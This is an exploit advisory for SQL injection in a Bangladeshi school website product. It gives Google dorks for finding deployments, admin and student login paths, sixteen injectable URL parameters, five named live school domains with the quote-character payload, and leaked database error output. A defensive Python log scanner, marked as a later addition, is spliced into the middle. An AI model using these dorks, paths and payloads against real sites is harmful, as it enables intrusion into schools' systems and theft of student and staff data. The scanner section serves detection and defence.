###############################################################
# Exploit Title : Soft IT Security Hululu IT Bangladesh SQL Injection Vulnerability
# Author [ Discovered By ] : KingSkrupellos
# Team : Cyberizm Digital Security Army
# Date : 08/01/2019
# Vendor Homepage : softitsecurity.com ~ hululuit.com
# Tested On : Windows and Linux
# Category : WebApps
# Exploit Risk : High
# Google Dorks : intext:''© Copyright 2019. Designed and Developed by Soft IT Security'' site:edu.bd
intext:''© Copyright 2019. Designed and Developed by Hululu IT'' site:edu.bd
# Vulnerability Type : CWE-89 [ Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') ]
# Cyberizm Exploit Reference Link : cyberizm.org/cyberizm-soft-it-security-hululu-it-bangladesh-sql-injection.html
###############################################################
Admin/Teacher/Student Panel Login Path =>
/adminoperation/
/teacheroperation/
/studentoperation/
# SQL Injection Exploits :
**********************
/?v=home.jsp&id=[SQL Injection]
/?v=administrationdeatils.jsp&id=[SQL Injection]
/?v=allteacher.jsp&id=[SQL Injection]
/?v=allclark.jsp&id=[SQL Injection]
/?v=talentstudent-detail.jsp&id=[SQL Injection]
/?v=allstudent.jsp&id=[SQL Injection]
/?v=boardresultdetails.jsp&id=1%27
/?v=universitydetails.jsp&id=[SQL Injection]
/?v=talentteacher-detail.jsp&id=[SQL Injection]
/?v=academiccalender-details.jsp&id=[SQL Injection]
/?v=allevent.jsp&id=[SQL Injection]
/?v=allresult.jsp&id=[SQL Injection]
/?v=noticebord-detail.jsp&id=[SQL Injection]
/?v=uploadbook-details.jsp&id=[SQL Injection]
/?v=usefulllinkdetails.jsp&id=[SQL Injection]
/?v=checkclass.jsp&id=[SQL Injection]
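A defensive check for the pages listed above, added here as an example and not part of the original advisory: it scans web access logs for requests to the listed v= pages whose id value is not a plain integer. The combined log format, the sample lines, and the assumption that legitimate ids are short decimal integers are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# View names copied from the advisory's list of affected pages.
ADVISORY_VIEWS = {
    "home.jsp", "administrationdeatils.jsp", "allteacher.jsp", "allclark.jsp",
    "talentstudent-detail.jsp", "allstudent.jsp", "boardresultdetails.jsp",
    "universitydetails.jsp", "talentteacher-detail.jsp",
    "academiccalender-details.jsp", "allevent.jsp", "allresult.jsp",
    "noticebord-detail.jsp", "uploadbook-details.jsp",
    "usefulllinkdetails.jsp", "checkclass.jsp",
}
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
NUMERIC_ID = re.compile(r"[0-9]{1,10}")  # assumption: ids are small positive integers

def suspicious_id(request_target):
    """Return (view, decoded id) when an advisory view gets a non-numeric id."""
    query = parse_qs(urlsplit(request_target).query, keep_blank_values=True)
    for view in query.get("v", []):
        if view.lower() not in ADVISORY_VIEWS:
            continue
        for value in query.get("id", []):
            if not NUMERIC_ID.fullmatch(value):
                return view, value
    return None

def scan(log_lines):
    """Return a list of (client, view, id) for each flagged request line."""
    hits = []
    for line in log_lines:
        match = REQUEST_RE.search(line)
        hit = suspicious_id(match.group(1)) if match else None
        if hit:
            hits.append((line.split()[0], *hit))
    return hits

# Constructed sample lines in combined log format (documentation IP ranges).
SAMPLE_LOG = [
    '192.0.2.10 - - [08/Jan/2019:10:00:01 +0000] "GET /?v=allteacher.jsp&id=12 HTTP/1.1" 200 5120',
    '198.51.100.7 - - [08/Jan/2019:10:02:13 +0000] "GET /?v=administrationdeatils.jsp&id=3%27 HTTP/1.1" 200 812',
    '198.51.100.7 - - [08/Jan/2019:10:02:15 +0000] "GET /?v=boardresultdetails.jsp&id=1%27 HTTP/1.1" 200 790',
    '192.0.2.10 - - [08/Jan/2019:10:03:40 +0000] "GET /?v=contact.jsp HTTP/1.1" 200 2048',
]

if __name__ == "__main__":
    for client, view, value in scan(SAMPLE_LOG):
        print(f"{client} sent non-numeric id {value!r} to {view}")
```

The same integer check applied server-side before the query is built, together with parameterized queries through mysqli or PDO, closes the injection point rather than only detecting probes against it.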
###############################################################
# Example Vulnerable Sites =>
***************************
Note : (192.185.94.62) => There are 182 domains hosted on this server.
[+] birgardusafiaalimmadrasah.edu.bd/?v=administrationdeatils.jsp&id=3%27
[+] haripuralimmadrasha.edu.bd/?v=administrationdeatils.jsp&id=3%27
[+] tislamunionhighschool.edu.bd/?v=administrationdeatils.jsp&id=3%27
[+] haripurwomenscollege.edu.bd/?v=administrationdeatils.jsp&id=3%27
[+] jamunhndm.edu.bd/?v=administrationdeatils.jsp&id=3%27
###############################################################
# SQL Database Error :
*********************
Deprecated: mysql_connect(): The mysql extension is deprecated and will be removed in the future: use mysqli or PDO instead in /home/birgardusafiaali/public_html/DAL/DbConnect.php on line 8
Warning: mysql_connect(): Access denied for user 'birgardu_school'@'localhost' (using password: YES) in /home/birgardusafiaali/public_html/DAL/DbConnect.php on line 8
Warning: fread(): Length parameter must be greater than 0 in /home/haripuralimmadra/public_html/controller/function.php on line 220
###############################################################
# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
###############################################################